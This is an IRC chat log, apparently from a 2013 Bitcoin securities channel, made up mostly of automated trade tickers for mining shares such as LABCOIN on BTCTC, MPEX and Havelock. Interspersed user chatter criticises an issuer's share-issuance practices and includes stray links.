hahaha Sep 22 03:27:36 nice name Sep 22 03:27:39 and right you are :) Sep 22 03:37:52 [BTCTC] [ASICMINER-PT] 1 @ 1.7 BTC [-] Sep 22 03:41:56 [BTCTC] [ASICMINER-PT] 2 @ 1.7 = 3.4 BTC [-] Sep 22 03:48:02 [BTCTC] [LABCOIN] 10000 @ 0.00169087 = 16.9087 BTC [+] {13} Sep 22 03:49:03 [BTCTC] [TAT.NEOBEE] 100 @ 0.003 = 0.3 BTC [+] Sep 22 03:52:06 [BTCTC] [FN] [DMS.SELLING] 158 @ 0.0071 = 1.1218 BTC [-] Sep 22 03:54:08 [BTCTC] [LABCOIN] 1250 @ 0.00171636 = 2.1455 BTC [+] {3} Sep 22 03:54:32 labcoin @ 800gh/s Sep 22 03:55:09 [BTCTC] [LABCOIN] 10000 @ 0.00173132 = 17.3132 BTC [+] {12} Sep 22 03:56:10 [BTCTC] [LABCOIN] 900 @ 0.00174334 = 1.569 BTC [+] {3} Sep 22 03:56:10 [MPEX] [S.MPOE] 9600 @ 0.00093579 = 8.9836 BTC [+] Sep 22 03:56:33 how do you know ? Sep 22 03:57:07 http://www.btcguild.com/index.php?page=rankings§ion=teams Sep 22 03:57:11 [BTCTC] [LABCOIN] 2143 @ 0.00174738 = 3.7446 BTC [+] {3} Sep 22 03:57:47 aha Sep 22 03:58:12 [BTCTC] [LABCOIN] 2751 @ 0.00174899 = 4.8115 BTC [+] {4} Sep 22 03:58:12 [BTCTC] [TAT.NEOBEE] 244 @ 0.002991 = 0.7298 BTC [-] Sep 22 04:00:14 [BTCTC] [LABCOIN] 6183 @ 0.00176828 = 10.9333 BTC [+] {9} Sep 22 04:01:15 [BTCTC] [LABCOIN] 1800 @ 0.00177797 = 3.2003 BTC [+] {4} Sep 22 04:02:16 [BTCTC] [LABCOIN] 20330 @ 0.00179397 = 36.4714 BTC [+] {16} Sep 22 04:02:16 [BTCTC] [ACTIVEMINING] 667 @ 0.00176058 = 1.1743 BTC [-] {5} Sep 22 04:03:17 [BTCTC] [LABCOIN] 630 @ 0.0018 = 1.134 BTC [+] {2} Sep 22 04:04:18 [BTCTC] [ACTIVEMINING] 603 @ 0.00171635 = 1.035 BTC [-] {4} Sep 22 04:04:18 [BTCTC] [LABCOIN] 400 @ 0.0016 = 0.64 BTC [-] Sep 22 04:05:19 [BTCTC] [LABCOIN] 400 @ 0.0018 = 0.72 BTC [+] Sep 22 04:06:20 [BTCTC] [FN] [DMS.SELLING] 89 @ 0.00715 = 0.6364 BTC [+] Sep 22 04:06:20 [BTCTC] [LABCOIN] 624 @ 0.0018 = 1.1232 BTC [+] {3} Sep 22 04:07:21 [BTCTC] [LABCOIN] 29000 @ 0.00185161 = 53.6967 BTC [+] {26} Sep 22 04:08:22 [BTCTC] [TAT.ASICMINER] 8 @ 0.01768 = 0.1414 BTC [+] Sep 22 04:08:22 [BTCTC] [MININGCO.ETF] 10 @ 0.05001 = 0.5001 BTC [-] Sep 22 04:09:28 ;;bc,stats Sep 22 04:09:30 Current Blocks: 259317 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 746 blocks | Next Difficulty In About: 3 days, 22 hours, 43 minutes, and 48 seconds | Next Difficulty Estimate: 140818775.996 | Estimated Percent Change: 25.02938 Sep 22 04:10:24 [BTCTC] [FN] [DMS.SELLING] 69 @ 0.00715 = 0.4934 BTC [+] Sep 22 04:10:24 [BTCTC] [LABCOIN] 877 @ 0.001954 = 1.7137 BTC [+] Sep 22 04:11:25 [BTCTC] [LABCOIN] 52 @ 0.001954 = 0.1016 BTC [+] Sep 22 04:11:25 [BTCTC] [ACTIVEMINING] 700 @ 0.00171697 = 1.2019 BTC [+] {6} Sep 22 04:12:26 [BTCTC] [LABCOIN] 600 @ 0.001954 = 1.1724 BTC [+] Sep 22 04:13:27 [BTCTC] [LABCOIN] 35687 @ 0.00203584 = 72.653 BTC [+] {32} Sep 22 04:13:27 [BTCTC] [BASIC-MINING] 24 @ 0.10790416 = 2.5897 BTC [-] {5} Sep 22 04:14:28 [BTCTC] [LABCOIN] 104 @ 0.00209996 = 0.2184 BTC [+] {2} Sep 22 04:15:29 [BTCTC] [LABCOIN] 1006 @ 0.002099 = 2.1116 BTC [-] {2} Sep 22 04:15:29 [BTCTC] [ACTIVEMINING] 1000 @ 0.0017106 = 1.7106 BTC [-] {3} Sep 22 04:16:31 [BTCTC] [ACTIVEMINING] 2000 @ 0.00170291 = 3.4058 BTC [-] {7} Sep 22 04:17:31 [BTCTC] [LABCOIN] 933 @ 0.002 = 1.866 BTC [-] Sep 22 04:18:33 [BTCTC] [LABCOIN] 751 @ 0.002099 = 1.5763 BTC [+] {2} Sep 22 04:19:33 [BTCTC] [LABCOIN] 152 @ 0.002099 = 0.319 BTC [+] {3} Sep 22 04:20:34 [BTCTC] [LABCOIN] 700 @ 0.00209992 = 1.4699 BTC [+] {3} Sep 22 04:21:36 [BTCTC] [LABCOIN] 1142 @ 0.00210174 = 2.4002 BTC [+] {5} Sep 22 04:22:36 [BTCTC] [LABCOIN] 807 @ 0.002 = 1.614 BTC [-] {3} Sep 22 04:22:37 [BTCTC] [ACTIVEMINING] 2867 @ 0.00170033 = 4.8748 BTC [-] {5} Sep 22 04:23:38 [BTCTC] [LABCOIN] 24300 @ 0.00218351 = 53.0593 BTC [+] {15} Sep 22 04:25:40 [BTCTC] [TAT.NEOBEE] 200 @ 0.002991 = 0.5982 BTC [-] Sep 22 04:26:41 [HAVELOCK] [LABCO] 65 @ 0.0022 = 0.143 BTC [+] Sep 22 04:26:42 [BTCTC] [LABCOIN] 200 @ 0.00218 = 0.436 BTC [+] Sep 22 04:26:42 [BTCTC] [ACTIVEMINING] 1000 @ 0.00166575 = 1.6658 BTC [-] {4} Sep 22 04:27:42 [BTCTC] [LABCOIN] 9858 @ 0.00219789 = 21.6668 BTC [+] {6} Sep 22 04:28:43 [BTCTC] [LABCOIN] 14125 @ 0.00223419 = 31.5579 BTC [+] {11} Sep 22 04:29:44 [BTCTC] [LABCOIN] 11775 @ 0.00223975 = 26.3731 BTC [+] {5} Sep 22 04:30:46 [BTCTC] [LABCOIN] 5225 @ 0.00224669 = 11.739 BTC [+] {8} Sep 22 04:30:46 [BTCTC] [ACTIVEMINING] 1883 @ 0.00163822 = 3.0848 BTC [-] {3} Sep 22 04:31:45 [BTCTC] [LABCOIN] 4615 @ 0.0022479 = 10.3741 BTC [+] {4} Sep 22 04:32:46 [BTCTC] [LABCOIN] 10638 @ 0.00228471 = 24.3047 BTC [+] {4} Sep 22 04:32:46 [BTCTC] [ASICMINER-PT] 15 @ 1.68619998 = 25.293 BTC [-] {7} Sep 22 04:32:46 [MPEX] [S.MPOE] 3700 @ 0.00093579 = 3.4624 BTC [+] Sep 22 04:32:47 [BTCTC] [COGNITIVE] 15 @ 0.14 = 2.1 BTC [-] Sep 22 04:33:47 [BTCTC] [LABCOIN] 6477 @ 0.0023462 = 15.1963 BTC [+] {12} Sep 22 04:33:47 [BTCTC] [BASIC-MINING] 1 @ 0.1058 BTC [-] Sep 22 04:34:48 [BTCTC] [LABCOIN] 67 @ 0.002374 = 0.1591 BTC [+] {3} Sep 22 04:35:49 [BTCTC] [LABCOIN] 725 @ 0.00235451 = 1.707 BTC [-] {4} Sep 22 04:36:50 [BTCTC] [LABCOIN] 8959 @ 0.00237413 = 21.2698 BTC [+] {7} Sep 22 04:37:51 [BTCTC] [LABCOIN] 27494 @ 0.00239676 = 65.8965 BTC [+] {13} Sep 22 04:38:52 [BTCTC] [LABCOIN] 7611 @ 0.00244028 = 18.573 BTC [+] {8} Sep 22 04:38:52 [BTCTC] [ACTIVEMINING] 1595 @ 0.00156054 = 2.4891 BTC [-] {5} Sep 22 04:39:53 [BTCTC] [ACTIVEMINING] 1028 @ 0.00153265 = 1.5756 BTC [-] {5} Sep 22 04:39:53 [BTCTC] [LABCOIN] 1116 @ 0.002399 = 2.6773 BTC [-] {3} Sep 22 04:40:54 [BTCTC] [LABCOIN] 1396 @ 0.00242104 = 3.3798 BTC [+] {8} Sep 22 04:41:55 [BTCTC] [LABCOIN] 200 @ 0.002399 = 0.4798 BTC [-] Sep 22 04:42:56 [BTCTC] [LABCOIN] 465 @ 0.00210961 = 0.981 BTC [-] {2} Sep 22 04:42:57 [BTCTC] [TAT.NEOBEE] 35 @ 0.002991 = 0.1047 BTC [-] Sep 22 04:43:57 [BTCTC] [LABCOIN] 325 @ 0.00239795 = 0.7793 BTC [+] {2} Sep 22 04:44:58 [BTCTC] [LABCOIN] 90976 @ 0.00245522 = 223.3661 BTC [+] {37} Sep 22 04:46:00 [BTCTC] [LABCOIN] 25055 @ 0.00248367 = 62.2284 BTC [+] {29} Sep 22 04:46:00 [BTCTC] [ACTIVEMINING] 860 @ 0.00152 = 1.3072 BTC [-] Sep 22 04:47:00 [BTCTC] [ASICMINER-PT] 3 @ 1.67666666 = 5.03 BTC [-] {2} Sep 22 04:47:01 [BTCTC] [LABCOIN] 73 @ 0.002641 = 0.1928 BTC [+] Sep 22 04:48:01 [BTCTC] [LABCOIN] 5633 @ 0.00264496 = 14.8991 BTC [+] {6} Sep 22 04:49:02 [BTCTC] [LABCOIN] 3762 @ 0.00264166 = 9.9379 BTC [-] {6} Sep 22 04:50:03 [BTCTC] [LABCOIN] 70 @ 0.00264054 = 0.1848 BTC [-] {3} Sep 22 04:51:04 [BTCTC] [LABCOIN] 212 @ 0.00264173 = 0.56 BTC [+] {4} Sep 22 04:51:04 [BTCTC] [ACTIVEMINING] 1506 @ 0.00152009 = 2.2893 BTC [+] {3} Sep 22 04:51:04 [MPEX] [S.MPOE] 4700 @ 0.0009348 = 4.3936 BTC [-] {2} Sep 22 04:52:05 [BTCTC] [LABCOIN] 861 @ 0.00262752 = 2.2623 BTC [-] {4} Sep 22 04:53:06 [BTCTC] [LABCOIN] 280 @ 0.00258453 = 0.7237 BTC [-] {2} Sep 22 04:54:07 [BTCTC] [ACTIVEMINING] 1000 @ 0.001522 = 1.522 BTC [+] Sep 22 04:54:07 [BTCTC] [LABCOIN] 1000 @ 0.00259 = 2.59 BTC [+] Sep 22 04:54:56 "[Backward-Auction]" Sep 22 04:54:57 lol Sep 22 04:55:08 [BTCTC] [LABCOIN] 1787 @ 0.00259 = 4.6283 BTC [+] {2} Sep 22 04:55:27 everyone loves labcoin again? Sep 22 04:56:09 [BTCTC] [LABCOIN] 900 @ 0.00259 = 2.331 BTC [+] Sep 22 04:57:00 i do lol Sep 22 04:57:10 [BTCTC] [ASICMINER-PT] 1 @ 1.71 BTC [+] Sep 22 04:57:15 dex Sep 22 04:57:18 yup Sep 22 04:57:21 whats this kate bullshit Sep 22 04:57:27 i have no idea, to be honest Sep 22 04:57:39 uhh Sep 22 04:57:39 it's a move on her own Sep 22 04:57:43 its your pt Sep 22 04:57:50 oh she imported? Sep 22 04:58:01 yes Sep 22 04:58:07 she's basically overriding your shit Sep 22 04:58:21 killing it Sep 22 04:58:31 not that we should be surprised Sep 22 04:58:54 but no one will buy the PT now Sep 22 04:59:01 and she's setting the tone Sep 22 04:59:12 [BTCTC] [LABCOIN] 1600 @ 0.002577 = 4.1232 BTC [+] {2} Sep 22 04:59:22 it's pretty much hammered down Sep 22 04:59:29 'dont buy this security, cuz if it's ever worth anything i'll just issue more shares' Sep 22 04:59:32 and people who bought in earlier are pretty much.. fucked Sep 22 04:59:42 but the liquidity! Sep 22 05:00:07 she's such a saint, i mean where would shares come from without her? Sep 22 05:00:16 meh Sep 22 05:00:17 fukn scams Sep 22 05:00:22 don't lure me into those discussions Sep 22 05:00:32 well these are things you need to think about Sep 22 05:00:39 it affects your rep Sep 22 05:00:40 yes Sep 22 05:00:56 this is why i didnt do a PT Sep 22 05:01:14 cuz her contract sucks and she just issues shares at will Sep 22 05:01:14 [BTCTC] [LABCOIN] 3224 @ 0.002212 = 7.1315 BTC [-] {11} Sep 22 05:01:52 do you have a fee for xfers? Sep 22 05:01:59 nope Sep 22 05:02:15 [BTCTC] [LABCOIN] 350 @ 0.002212 = 0.7742 BTC [-] Sep 22 05:02:21 not that it woulda stopped her Sep 22 05:02:28 it's a unique problem Sep 22 05:02:37 i'm waiting for burnside to implement an api endpoint to transfer shares to the bitcoin address instead of the username Sep 22 05:02:44 and another reason why companies shouldnbt run their own security Sep 22 05:03:06 she has total ability to muscle you out of the equation Sep 22 05:03:08 after this is done, i'd set up an automatic share transfer. this was my "goalcard", so to speak Sep 22 05:03:16 [BTCTC] [LABCOIN] 392 @ 0.002548 = 0.9988 BTC [+] Sep 22 05:03:19 it should be you buying underlying and creating liquidity Sep 22 05:03:51 if you automate and take a cut, what's the point? Sep 22 05:03:56 dont take a cut* Sep 22 05:04:12 never said i wouldn't Sep 22 05:04:16 ah Sep 22 05:04:17 [MPEX] [S.MPOE] 1600 @ 0.00093579 = 1.4973 BTC [+] Sep 22 05:04:55 but i plan to start free Sep 22 05:05:00 to get more volume Sep 22 05:05:06 it wont matter Sep 22 05:05:14 just charge what you feel is fair Sep 22 05:05:32 and provide your own liquidity if it's not popular Sep 22 05:05:51 it's not like it's good money managing unpopular PTs Sep 22 05:05:53 get yours Sep 22 05:06:20 [BTCTC] [ACTIVEMINING] 200 @ 0.00154 = 0.308 BTC [+] Sep 22 05:07:21 [BTCTC] [LABCOIN] 124 @ 0.00249499 = 0.3094 BTC [+] {4} Sep 22 05:09:23 [BTCTC] [LABCOIN] 100 @ 0.0024 = 0.24 BTC [-] Sep 22 05:10:24 [BTCTC] [LABCOIN] 2324 @ 0.00239897 = 5.5752 BTC [-] {6} Sep 22 05:11:25 [BTCTC] [LABCOIN] 2057 @ 0.00244231 = 5.0238 BTC [+] {5} Sep 22 05:12:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.01572459 = 0.7862 BTC [-] {3} Sep 22 05:13:27 [BTCTC] [ASICMINER-PT] 1 @ 1.677 BTC [-] Sep 22 05:14:28 [BTCTC] [LABCOIN] 1000 @ 0.00244901 = 2.449 BTC [+] {2} Sep 22 05:15:29 [BTCTC] [LABCOIN] 2750 @ 0.00244935 = 6.7357 BTC [+] {4} Sep 22 05:15:52 https://bitcointalk.org/index.php?topic=299185.0;topicseen Sep 22 05:15:57 [Ice-Dice.com] 1% Edge | Made For Mobile | Invest or Play | Officially Launched Sep 22 05:16:00 melts in your hands! Sep 22 05:17:31 [BTCTC] [LABCOIN] 150 @ 0.002488 = 0.3732 BTC [+] Sep 22 05:20:34 [BTCTC] [ASICMINER-PT] 3 @ 1.677 = 5.031 BTC [-] Sep 22 05:20:50 from the people that brought you ice drill? Sep 22 05:23:36 [BTCTC] [ASICMINER-PT] 5 @ 1.6762 = 8.381 BTC [-] {2} Sep 22 05:23:55 dexX7 actually the share issue move affords you a good opportunity to bail the entire nonsense. Sep 22 05:24:37 [BTCTC] [ASICMINER-PT] 2 @ 1.676 = 3.352 BTC [-] Sep 22 05:27:40 [BTCTC] [LABCOIN] 50 @ 0.0024 = 0.12 BTC [-] Sep 22 05:37:50 [BTCTC] [ACTIVEMINING] 20455 @ 0.00151134 = 30.9145 BTC [-] {12} Sep 22 05:40:53 [BTCTC] [LABCOIN] 150 @ 0.002398 = 0.3597 BTC [-] Sep 22 05:41:54 [BTCTC] [ASICMINER-PT] 11 @ 1.67518181 = 18.427 BTC [-] {2} Sep 22 05:41:54 [BTCTC] [TAT.NEOBEE] 121 @ 0.002991 = 0.3619 BTC [-] Sep 22 05:41:54 [BTCTC] [LABCOIN] 67 @ 0.002399 = 0.1607 BTC [+] Sep 22 05:42:55 [BTCTC] [LABCOIN] 12798 @ 0.00245565 = 31.4274 BTC [+] {7} Sep 22 05:43:40 mircea_popescu: i disagree. this wouldn't solve anything and leaves a very bad taste and i will rather try to improve things here Sep 22 05:43:56 [BTCTC] [LABCOIN] 13711 @ 0.002499 = 34.2638 BTC [+] Sep 22 05:44:57 [BTCTC] [LABCOIN] 577 @ 0.0025 = 1.4425 BTC [+] {2} Sep 22 05:45:58 [BTCTC] [LABCOIN] 8200 @ 0.00256557 = 21.0377 BTC [+] {3} Sep 22 05:48:00 [BTCTC] [TAT.ASICMINER] 13 @ 0.01645 = 0.2139 BTC [+] Sep 22 05:48:00 [BTCTC] [LABCOIN] 2000 @ 0.002577 = 5.154 BTC [+] Sep 22 05:51:03 [BTCTC] [LABCOIN] 2450 @ 0.002577 = 6.3137 BTC [+] {3} Sep 22 05:52:04 [BTCTC] [LABCOIN] 2081 @ 0.0025 = 5.2025 BTC [-] {2} Sep 22 05:57:10 [BTCTC] [LABCOIN] 400 @ 0.002577 = 1.0308 BTC [+] Sep 22 06:01:14 your call to make. Sep 22 06:03:16 [BTCTC] [BASIC-MINING] 3 @ 0.1063 = 0.3189 BTC [+] {2} Sep 22 06:05:18 [BTCTC] [LABCOIN] 1495 @ 0.0025 = 3.7375 BTC [-] Sep 22 06:08:21 [BTCTC] [LABCOIN] 3104 @ 0.0025639 = 7.9583 BTC [+] {4} Sep 22 06:09:22 [BTCTC] [LABCOIN] 2500 @ 0.0025832 = 6.458 BTC [+] {5} Sep 22 06:11:24 [BTCTC] [LABCOIN] 110 @ 0.002638 = 0.2902 BTC [+] Sep 22 06:14:06 I can't believe they named a hurricane after usagi Sep 22 06:14:15 Fitting Sep 22 06:19:32 [BTCTC] [LABCOIN] 113 @ 0.002636 = 0.2979 BTC [-] Sep 22 06:21:34 [BTCTC] [TAT.ASICMINER] 12 @ 0.01571 = 0.1885 BTC [-] Sep 22 06:21:34 [BTCTC] [LABCOIN] 125 @ 0.0026 = 0.325 BTC [-] {2} Sep 22 06:23:36 [BTCTC] [LABCOIN] 80 @ 0.002635 = 0.2108 BTC [+] Sep 22 06:23:36 [MPEX] [S.MPOE] 20400 @ 0.00093969 = 19.1697 BTC [+] {2} Sep 22 06:23:45 so whatever happened to this bitfountain shit? Sep 22 06:23:48 guess that's not happening Sep 22 06:26:39 [BTCTC] [LABCOIN] 30405 @ 0.00265491 = 80.7225 BTC [+] {16} Sep 22 06:27:40 [BTCTC] [LABCOIN] 87 @ 0.002698 = 0.2347 BTC [+] Sep 22 06:30:43 [BTCTC] [FN] [BTC-GROWTH] 30 @ 0.0957 = 2.871 BTC [-] Sep 22 06:31:44 [BTCTC] [LABCOIN] 2400 @ 0.002695 = 6.468 BTC [-] Sep 22 06:32:45 [BTCTC] [DMS.MINING] 472 @ 0.001755 = 0.8284 BTC [-] Sep 22 06:32:45 [BTCTC] [LABCOIN] 10000 @ 0.00276773 = 27.6773 BTC [+] {7} Sep 22 06:34:47 [BTCTC] [LABCOIN] 25611 @ 0.00278422 = 71.3067 BTC [+] {6} Sep 22 06:35:48 [BTCTC] [FIMB] 39 @ 0.01576923 = 0.615 BTC [+] {2} Sep 22 06:36:49 [MPEX] [S.MPOE] 8180 @ 0.00093418 = 7.6416 BTC [-] {4} Sep 22 06:36:49 [BTCTC] [NASTY-PT] 193 @ 0.00169 = 0.3262 BTC [-] Sep 22 06:40:52 [HAVELOCK] [AM1] 3 @ 1.66 = 4.98 BTC [+] {2} Sep 22 06:40:53 [BTCTC] [LABCOIN] 15000 @ 0.00283821 = 42.5732 BTC [+] {14} Sep 22 06:40:53 [BTCTC] [FIMB] 40 @ 0.108 = 4.32 BTC [+] Sep 22 06:40:54 [BTCTC] [ACTIVEMINING] 4112 @ 0.00168284 = 6.9198 BTC [+] {9} Sep 22 06:41:53 [BTCTC] [FIMB] 40 @ 0.01095 = 0.438 BTC [-] Sep 22 06:43:55 [BTCTC] [LABCOIN] 14600 @ 0.00284732 = 41.5709 BTC [+] {4} Sep 22 06:45:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.0164 = 0.164 BTC [-] Sep 22 06:49:00 [BTCTC] [LABCOIN] 1220 @ 0.00283885 = 3.4634 BTC [-] {4} Sep 22 06:52:03 [BTCTC] [LABCOIN] 55 @ 0.00284 = 0.1562 BTC [+] {2} Sep 22 06:52:04 [BTCTC] [ASICMINER-PT] 12 @ 1.676 = 20.112 BTC [+] Sep 22 06:53:05 [BTCTC] [ACTIVEMINING] 7038 @ 0.00152874 = 10.7593 BTC [-] {9} Sep 22 06:54:06 [BTCTC] [ASICMINER-PT] 1 @ 1.675 BTC [-] Sep 22 06:54:06 [BTCTC] [ACTIVEMINING] 1075 @ 0.0015 = 1.6125 BTC [-] Sep 22 06:56:08 [BTCTC] [LABCOIN] 2545 @ 0.00284 = 7.2278 BTC [+] Sep 22 06:57:09 [BTCTC] [LABCOIN] 780 @ 0.002604 = 2.0311 BTC [-] {2} Sep 22 06:58:10 [BTCTC] [LABCOIN] 1890 @ 0.00284245 = 5.3722 BTC [+] {5} Sep 22 06:59:11 [BTCTC] [ASICMINER-PT] 3 @ 1.676 = 5.028 BTC [+] Sep 22 07:00:12 [BTCTC] [ASICMINER-PT] 1 @ 1.712 BTC [+] Sep 22 07:03:15 [BTCTC] [ACTIVEMINING] 1614 @ 0.00145523 = 2.3487 BTC [-] {5} Sep 22 07:04:16 [BTCTC] [FIMB] 63 @ 0.10766507 = 6.7829 BTC [+] {3} Sep 22 07:05:17 [BTCTC] [LABCOIN] 800 @ 0.00282475 = 2.2598 BTC [-] {2} Sep 22 07:06:18 [BTCTC] [LABCOIN] 1005 @ 0.00282288 = 2.837 BTC [-] {2} Sep 22 07:07:19 [MPEX] [S.MPOE] 1648 @ 0.00093315 = 1.5378 BTC [-] Sep 22 07:07:19 [BTCTC] [LABCOIN] 2000 @ 0.002799 = 5.598 BTC [-] Sep 22 07:08:20 [BTCTC] [LABCOIN] 1505 @ 0.002799 = 4.2125 BTC [-] {2} Sep 22 07:09:21 [BTCTC] [LABCOIN] 1395 @ 0.00280502 = 3.913 BTC [+] {2} Sep 22 07:10:22 [BTCTC] [TAT.ASICMINER] 52 @ 0.01602 = 0.833 BTC [-] Sep 22 07:13:25 [BTCTC] [LABCOIN] 272 @ 0.002798 = 0.7611 BTC [-] Sep 22 07:16:28 [BTCTC] [LABCOIN] 30541 @ 0.00282658 = 86.3266 BTC [+] {9} Sep 22 07:18:30 [BTCTC] [LABCOIN] 2634 @ 0.002845 = 7.4937 BTC [+] {2} Sep 22 07:20:31 [BTCTC] [LABCOIN] 885 @ 0.002845 = 2.5178 BTC [+] Sep 22 07:21:28 http://upload.wikimedia.org/wikipedia/commons/c/cb/Anasyromenos_statuette%2C_Rome_art_market.JPG Sep 22 07:21:31 it's a... trap. Sep 22 07:23:34 [BTCTC] [LABCOIN] 5000 @ 0.002846 = 14.23 BTC [+] Sep 22 07:26:37 [BTCTC] [LABCOIN] 5715 @ 0.00283084 = 16.1783 BTC [-] {4} Sep 22 07:29:41 [BTCTC] [ASICMINER-PT] 1 @ 1.675 BTC [-] Sep 22 07:34:46 [BTCTC] [DMS.MINING] 150 @ 0.001755 = 0.2633 BTC [-] Sep 22 07:35:47 [BTCTC] [FN] [DMS.SELLING] 328 @ 0.00715 = 2.3452 BTC [+] Sep 22 07:35:47 [BTCTC] [LABCOIN] 50 @ 0.002721 = 0.1361 BTC [-] {2} Sep 22 07:36:48 [BTCTC] [ASICMINER-PT] 25 @ 1.65643997 = 41.411 BTC [-] {13} Sep 22 07:37:49 [BTCTC] [FN] [DMS.SELLING] 250 @ 0.007188 = 1.797 BTC [+] {2} Sep 22 07:40:52 [HAVELOCK] [B] [XBOND] 436 @ 0.00116507 = 0.508 BTC [-] {2} Sep 22 07:41:53 [HAVELOCK] [AM100] 15 @ 0.0169 = 0.2535 BTC [+] Sep 22 07:45:57 [BTCTC] [LABCOIN] 704 @ 0.00272611 = 1.9192 BTC [-] {2} Sep 22 07:45:57 [HAVELOCK] [AM100] 15 @ 0.0169 = 0.2535 BTC [+] Sep 22 07:46:58 [HAVELOCK] [AM100] 7 @ 0.01612 = 0.1128 BTC [-] Sep 22 07:55:06 [BTCTC] [LABCOIN] 1500 @ 0.00256754 = 3.8513 BTC [-] {3} Sep 22 07:56:07 [BTCTC] [LABCOIN] 300 @ 0.002552 = 0.7656 BTC [-] Sep 22 08:05:16 [BTCTC] [CIPHERMINE-PT] 311 @ 0.04501105 = 13.9984 BTC [-] {6} Sep 22 08:07:18 [BTCTC] [ASICMINER-PT] 5 @ 1.6514 = 8.257 BTC [-] {4} Sep 22 08:08:19 [BTCTC] [LABCOIN] 700 @ 0.00256945 = 1.7986 BTC [+] {2} Sep 22 08:09:20 [BTCTC] [FN] [DMS.SELLING] 127 @ 0.0071 = 0.9017 BTC [-] Sep 22 08:10:21 [BTCTC] [B] [CIPHERMINE.B1] 289 @ 0.01032805 = 2.9848 BTC [-] {4} Sep 22 08:12:23 [BTCTC] [LABCOIN] 10000 @ 0.00281493 = 28.1493 BTC [+] {8} Sep 22 08:15:26 [BTCTC] [LABCOIN] 397 @ 0.00283998 = 1.1275 BTC [+] {2} Sep 22 08:16:27 [BTCTC] [LABCOIN] 1603 @ 0.00284137 = 4.5547 BTC [+] {2} Sep 22 08:19:30 [BTCTC] [ASICMINER-PT] 13 @ 1.65030768 = 21.454 BTC [-] {7} Sep 22 08:20:31 [BTCTC] [ASICMINER-PT] 1 @ 1.688 BTC [+] Sep 22 08:22:33 [BTCTC] [LABCOIN] 16743 @ 0.00284455 = 47.6263 BTC [+] {7} Sep 22 08:24:35 [BTCTC] [LABCOIN] 200 @ 0.002847 = 0.5694 BTC [+] Sep 22 08:25:36 [HAVELOCK] [DEALCO] 28 @ 0.00800011 = 0.224 BTC [-] Sep 22 08:27:38 [HAVELOCK] [DEALCO] 38 @ 0.00800001 = 0.304 BTC [-] Sep 22 08:28:40 [BTCTC] [COGNITIVE] 6 @ 0.14 = 0.84 BTC [-] Sep 22 08:29:41 [BTCTC] [LABCOIN] 450 @ 0.002847 = 1.2812 BTC [+] Sep 22 08:29:41 [HAVELOCK] [LABCO] 59 @ 0.00268 = 0.1581 BTC [+] Sep 22 08:30:42 [HAVELOCK] [LABCO] 60 @ 0.00268833 = 0.1613 BTC [+] {2} Sep 22 08:31:42 [HAVELOCK] [LABCO] 80 @ 0.00269999 = 0.216 BTC [+] Sep 22 08:34:45 [BTCTC] [BTC-TRADING-PT] 55 @ 0.65460542 = 36.0033 BTC [-] {10} Sep 22 08:35:46 [BTCTC] [COGNITIVE] 10 @ 0.13997 = 1.3997 BTC [-] {3} Sep 22 08:36:47 [BTCTC] [COGNITIVE] 16 @ 0.13617499 = 2.1788 BTC [-] {4} Sep 22 08:37:48 [BTCTC] [COGNITIVE] 3 @ 0.1239 = 0.3717 BTC [-] {3} Sep 22 08:37:48 [HAVELOCK] [LABCO] 773 @ 0.00269999 = 2.0871 BTC [+] {2} Sep 22 08:38:49 [HAVELOCK] [LABCO] 100 @ 0.00273999 = 0.274 BTC [+] Sep 22 08:42:53 [BTCTC] [ACTIVEMINING] 113 @ 0.00143315 = 0.1619 BTC [+] {3} Sep 22 08:46:57 [HAVELOCK] [LABCO] 603 @ 0.0029 = 1.7487 BTC [+] {2} Sep 22 08:46:58 [BTCTC] [LABCOIN] 287 @ 0.002814 = 0.8076 BTC [-] Sep 22 08:46:58 [BTCTC] [DMS.MINING] 461 @ 0.0019117 = 0.8813 BTC [+] {6} Sep 22 08:47:58 [HAVELOCK] [LABCO] 300 @ 0.002985 = 0.8955 BTC [+] Sep 22 08:50:00 [HAVELOCK] [LABCO] 248 @ 0.002985 = 0.7403 BTC [+] Sep 22 08:56:06 [BTCTC] [TAT.NEOBEE] 100 @ 0.002997 = 0.2997 BTC [-] Sep 22 08:58:08 [BTCTC] [LABCOIN] 2725 @ 0.00268108 = 7.3059 BTC [-] {4} Sep 22 09:04:14 [BTCTC] [COGNITIVE] 3 @ 0.1162 = 0.3486 BTC [-] Sep 22 09:06:16 [BTCTC] [LABCOIN] 15000 @ 0.00260089 = 39.0134 BTC [-] {6} Sep 22 09:11:21 [BTCTC] [LABCOIN] 2080 @ 0.002 = 4.16 BTC [-] Sep 22 09:12:22 [BTCTC] [LABCOIN] 4080 @ 0.00259319 = 10.5802 BTC [+] {5} Sep 22 09:14:24 [BTCTC] [LABCOIN] 300 @ 0.002708 = 0.8124 BTC [+] {2} Sep 22 09:15:25 [BTCTC] [LABCOIN] 900 @ 0.002628 = 2.3652 BTC [-] Sep 22 09:17:27 [HAVELOCK] [LABCO] 78 @ 0.003 = 0.234 BTC [+] Sep 22 09:20:30 [BTCTC] [LABCOIN] 302 @ 0.00257 = 0.7761 BTC [-] Sep 22 09:21:32 [BTCTC] [LABCOIN] 3593 @ 0.00256179 = 9.2045 BTC [-] {4} Sep 22 09:24:34 [MPEX] [S.MPOE] 2850 @ 0.00093167 = 2.6553 BTC [-] {2} Sep 22 09:24:35 [BTCTC] [LABCOIN] 392 @ 0.002726 = 1.0686 BTC [+] Sep 22 09:32:43 [BTCTC] [ASICMINER-PT] 1 @ 1.664 BTC [-] Sep 22 09:32:43 [BTCTC] [LABCOIN] 392 @ 0.002711 = 1.0627 BTC [-] Sep 22 09:34:45 [BTCTC] [ASICMINER-PT] 2 @ 1.6645 = 3.329 BTC [+] {2} Sep 22 09:34:45 [BTCTC] [LABCOIN] 1450 @ 0.002713 = 3.9339 BTC [+] Sep 22 09:35:45 [MPEX] [S.MPOE] 6502 @ 0.00093259 = 6.0637 BTC [+] Sep 22 09:47:57 [BTCTC] [LABCOIN] 499 @ 0.002697 = 1.3458 BTC [-] Sep 22 09:48:58 [BTCTC] [LABCOIN] 1501 @ 0.002697 = 4.0482 BTC [-] {2} Sep 22 09:49:59 [BTCTC] [LABCOIN] 14600 @ 0.00270188 = 39.4474 BTC [+] {11} Sep 22 09:55:04 [BTCTC] [FIMB] 179 @ 0.01109 = 1.9851 BTC [-] Sep 22 09:57:06 [BTCTC] [FIMB] 11 @ 0.0109 = 0.1199 BTC [-] {2} 